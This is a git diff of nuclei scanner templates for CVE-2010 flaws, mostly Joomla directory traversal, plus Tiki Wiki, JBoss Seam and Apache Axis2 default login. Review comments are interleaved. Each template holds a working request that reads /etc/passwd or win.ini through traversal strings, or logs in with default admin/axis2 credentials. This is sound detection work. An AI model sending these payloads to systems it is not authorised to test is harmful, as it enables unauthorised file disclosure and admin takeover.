a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml b/nuclei-templates/CVE-2010/CVE-2010-1531.yaml deleted file mode 100644 index 5186a8ad9c..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: CVE-2010-1531 - -info: - name: Joomla! Component redSHOP 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12054 - - https://www.cvedetails.com/cve/CVE-2010-1531 - - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1531 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml b/nuclei-templates/CVE-2010/CVE-2010-1532.yaml deleted file mode 100644 index 79bd64b71f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1532 - -info: - name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12118 - - https://www.cvedetails.com/cve/CVE-2010-1532 - - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/ - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1532 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/cve-2010-1534.yaml b/nuclei-templates/CVE-2010/CVE-2010-1534.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1534.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1534.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml b/nuclei-templates/CVE-2010/CVE-2010-1540.yaml deleted file mode 100644 index 96f9e16d7f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1540 - -info: - name: Joomla! Component com_blog - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - reference: - - https://www.exploit-db.com/exploits/11625 - - https://www.cvedetails.com/cve/CVE-2010-1540 - - http://secunia.com/advisories/38777 - - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ - classification: - cve-id: CVE-2010-1540 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2010/cve-2010-1601.yaml b/nuclei-templates/CVE-2010/CVE-2010-1601.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1601.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1601.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1602.yaml b/nuclei-templates/CVE-2010/CVE-2010-1602.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1602.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1602.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml b/nuclei-templates/CVE-2010/CVE-2010-1653.yaml deleted file mode 100644 index 46a8f7b565..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1653 - -info: - name: Joomla! Component Graphics 1.0.6 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12430 - - https://www.cvedetails.com/cve/CVE-2010-1653 - - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt - - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/ - classification: - cve-id: CVE-2010-1653 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1714.yaml b/nuclei-templates/CVE-2010/CVE-2010-1714.yaml deleted file mode 100644 index 6470d09b21..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1714.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: CVE-2010-1714 -info: - name: Joomla! Component Arcade Games 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12168 - - https://www.cvedetails.com/cve/CVE-2010-1714 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1714 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1715.yaml b/nuclei-templates/CVE-2010/CVE-2010-1715.yaml deleted file mode 100644 index 54a29f73dd..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1715.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1715 - -info: - name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12174 - - https://www.cvedetails.com/cve/CVE-2010-1715 - - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - - http://www.osvdb.org/63659 - classification: - cve-id: CVE-2010-1715 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/nuclei-templates/CVE-2010/cve-2010-1717.yaml b/nuclei-templates/CVE-2010/CVE-2010-1717.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1717.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1717.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml b/nuclei-templates/CVE-2010/CVE-2010-1718.yaml deleted file mode 100644 index 6be07b8c31..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1718 - -info: - name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12282 - - https://www.cvedetails.com/cve/CVE-2010-1718 - - http://secunia.com/advisories/39521 - - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ - classification: - cve-id: CVE-2010-1718 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/cve-2010-1719.yaml b/nuclei-templates/CVE-2010/CVE-2010-1719.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1719.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1719.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1722.yaml b/nuclei-templates/CVE-2010/CVE-2010-1722.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1722.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1722.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1871.yaml b/nuclei-templates/CVE-2010/CVE-2010-1871.yaml deleted file mode 100644 index 2377160816..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1871.yaml +++ /dev/null 
@@ -1,23 +0,0 @@ -id: CVE-2010-1871 -info: - name: JBoss Seam 2 Code Execution - author: medbsq - severity: high -# - https://www.cvebase.com/cve/2010/1871 -requests: - - method: GET - path: - - "{{BaseURL}}:8080/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - matchers-condition: and - matchers: - - type: word - words: - - "java.lang." - - "For input string: \"zie\"" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1878.yaml b/nuclei-templates/CVE-2010/CVE-2010-1878.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1878.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1878.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1952.yaml b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1952.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1952.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1953.yaml b/nuclei-templates/CVE-2010/CVE-2010-1953.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1953.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1953.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml b/nuclei-templates/CVE-2010/CVE-2010-1954.yaml deleted file mode 100644 index 92e25accb9..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1954 - -info: - name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12287 - - https://www.cvedetails.com/cve/CVE-2010-1954 - - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/ - - http://www.exploit-db.com/exploits/12287 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1954 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1957.yaml b/nuclei-templates/CVE-2010/CVE-2010-1957.yaml deleted file mode 100644 index bc73c2d14e..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1957.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2010-1957 - -info: - name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12235 - - https://www.cvedetails.com/cve/CVE-2010-1957 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1957 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/16 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml b/nuclei-templates/CVE-2010/CVE-2010-1979.yaml deleted file mode 100644 index bd92fd237b..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2010-1979 - -info: - name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12088 - - https://www.cvedetails.com/cve/CVE-2010-1979 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1979 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-1983.yaml b/nuclei-templates/CVE-2010/CVE-2010-1983.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1983.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1983.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2033.yaml b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2033.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2033.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2035.yaml b/nuclei-templates/CVE-2010/CVE-2010-2035.yaml deleted file mode 100644 index 95076b9c42..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2035.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2010-2035 - -info: - name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34006 - - https://www.cvedetails.com/cve/CVE-2010-2035 - - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2035 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2050.yaml b/nuclei-templates/CVE-2010/CVE-2010-2050.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2050.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2050.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2128.yaml b/nuclei-templates/CVE-2010/CVE-2010-2128.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2128.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2128.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml b/nuclei-templates/CVE-2010/CVE-2010-2259.yaml deleted file mode 100644 index ac73172c1b..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2010-2259 - -info: - name: Joomla! Component com_bfsurvey - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/10946 - - https://www.cvedetails.com/cve/CVE-2010-2259 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2259 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2307.yaml b/nuclei-templates/CVE-2010/CVE-2010-2307.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2307.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2307.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2861.yaml b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2861.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2861.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2918.yaml b/nuclei-templates/CVE-2010/CVE-2010-2918.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2918.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2918.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2920.yaml b/nuclei-templates/CVE-2010/CVE-2010-2920.yaml deleted file mode 100644 index 4b9def58c4..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2920.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2010-2920 - -info: - name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12120 - - https://www.cvedetails.com/cve/CVE-2010-2920 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2920 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml deleted file mode 100644 index e305fa4fca..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2010-3426 - -info: - name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/14964 - - https://www.cvedetails.com/cve/CVE-2010-3426 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-3426 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml new file mode 100644 index 0000000000..3b556de705 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-4239 + +info: + name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion + author: 0x_akoko + severity: high + description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion + reference: + - https://www.cvedetails.com/cve/CVE-2010-4239 + - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2010-4239 + cwe-id: CWE-20 + tags: cve,cve2010,tikiwiki,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body 
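Review bot: The request in the new CVE-2010-4239.yaml hard-codes the `/tiki-5.2/` install directory and reads only `windows/win.ini`, so a clean result says nothing about Tiki installs under another path or on non-Windows hosts, and the one-line description does not tell the operator that. I would spell the scope out, e.g. `description: Tiki Wiki CMS Groupware 5.2 is affected by local file inclusion via the language parameter of tiki-jsplugin.php; this check only covers Windows hosts with Tiki under /tiki-5.2/.` `stop-at-first-match: true` has nothing to stop with a single path and can be dropped. `cwe-id: CWE-20` is also broader than the path-traversal class (CWE-22) the request exercises; worth checking against the CVE record.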
diff --git a/nuclei-templates/CVE-2010/cve-2010-4617.yaml b/nuclei-templates/CVE-2010/CVE-2010-4617.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-4617.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-4617.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-4769.yaml b/nuclei-templates/CVE-2010/CVE-2010-4769.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-4769.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-4769.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-5028.yaml b/nuclei-templates/CVE-2010/CVE-2010-5028.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-5028.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-5028.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-5278.yaml b/nuclei-templates/CVE-2010/CVE-2010-5278.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-5278.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-5278.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-5286.yaml b/nuclei-templates/CVE-2010/CVE-2010-5286.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-5286.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-5286.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-0219.yaml b/nuclei-templates/CVE-2010/cve-2010-0219.yaml
new file mode 100644
index 0000000000..1599e7084c
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0219.yaml
@@ -0,0 +1,53 @@ +id: CVE-2010-0219 + +info: + name: Apache Axis2 Default Login + author: pikpikcu + severity: high + description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 + - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - http://www.vupen.com/english/advisories/2010/2673 + classification: + cve-id: CVE-2010-0219 + metadata: + shodan-query: http.html:"Apache Axis" + tags: cve,cve2010,axis,apache,default-login,axis2 + +requests: + - raw: + - | + POST /axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginUsername={{username}}&loginPassword={{password}} + + - | + POST /axis2/axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{username}}&password={{password}}&submit=+Login+ + + payloads: + username: + - admin + password: + - axis2 + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + words: + - "

Welcome to Axis2 Web Admin Module !!

" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2010/cve-2010-0696.yaml b/nuclei-templates/CVE-2010/cve-2010-0696.yaml new file mode 100644 index 0000000000..b659158355 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0696.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-0696 + +info: + name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval + author: daffainfo + severity: high + description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/11447 + - https://www.cvedetails.com/cve/CVE-2010-0696 + - http://secunia.com/advisories/38587 + - http://www.joomlaworks.gr/content/view/77/34/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0696 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-0944.yaml b/nuclei-templates/CVE-2010/cve-2010-0944.yaml new file mode 100644 index 0000000000..e3e41de5b4 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0944.yaml 
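Review bot: Both login POSTs in cve-2010-0219.yaml are sent with the default credentials even when the first one already matches, because the request block has no `stop-at-first-match: true`; adding it keeps the scan to one authentication attempt per affected host. The template also carries no `remediation:` although sibling templates in this commit do; something like `remediation: Change the default axis2 admin password and restrict access to the axis2-admin console.` would tell the reader what to do with a hit. The word matcher's string is shown here broken over several lines; if that is how it is stored in the file and not an artefact of how the patch was rendered, it should be checked against a real login response, since a multi-line literal is unlikely to match a single-line heading.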
@@ -0,0 +1,30 @@
+id: CVE-2010-0944
+
+info:
+ name: Joomla! Component com_jcollection - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11088
+ - https://www.cvedetails.com/cve/CVE-2010-0944
+ - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
+ - http://www.exploit-db.com/exploits/11088
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-0944
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/cve-2010-0972.yaml b/nuclei-templates/CVE-2010/cve-2010-0972.yaml
new file mode 100644
index 0000000000..37c142f65b
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0972.yaml
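Review bot: The probe in cve-2010-0944.yaml relies on a trailing `%00` to cut off whatever the component appends to the included path, and PHP releases that reject NUL bytes in file names (5.3.4 and later, as far as I know) no longer honour that, so a miss means only that this vector failed, not that the component is absent or fixed. The same applies to the `%00` requests in cve-2010-0972, -0985, -1217, -1313, -1469 and -1470 in this patch. I would say so in each `description:`, e.g. by appending `A negative result does not rule out a vulnerable component; verify the installed version.` The last reference here (`http://www.exploit-db.com/exploits/11088`) duplicates the HTTPS entry above it and can go; cve-2010-1469.yaml has the same duplicate.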
@@ -0,0 +1,29 @@
+id: CVE-2010-0972
+
+info:
+ name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11738
+ - https://www.cvedetails.com/cve/CVE-2010-0972
+ - http://secunia.com/advisories/38925
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-0972
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
